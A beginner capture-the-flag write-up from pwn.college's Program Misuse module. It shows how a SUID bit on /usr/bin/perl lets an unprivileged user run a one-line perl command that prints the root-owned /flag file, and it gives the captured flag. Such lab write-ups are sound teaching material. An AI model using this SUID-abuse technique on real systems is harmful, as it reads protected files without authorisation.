Challenge Name: perl
Writeup from Program Misuse
Category: Program Misuse
Platform: pwn.college
Difficulty: Beginner
Date: 2025-07-16
Author: Himanshu Parate
π§ Summary:
The challenge abuses a SUID bit set on /usr/bin/perl, allowing an unprivileged user to read the root-owned flag file at /flag.
π Enumeration
ls -l /usr/bin/perl
Output:
-rwsr-xr-x 1 root root 47480 Sep 5 2019 /usr/bin/perl
- The
sin-rwsindicates itβs a SUID binary. perlruns with root privileges.
π Exploitation
The perl command runs Perl scripts β a powerful language used for text processing, scripting, automation.
We can simple create a peral based file reader to read contents of /flag.
perl -e 'open(F,"/flag"); print <F>; close F;'
Output:
pwn.college{YycVFpdHZT30LHkl6N9QDYFHWnk.dNDOxwSM0IzMyEzW}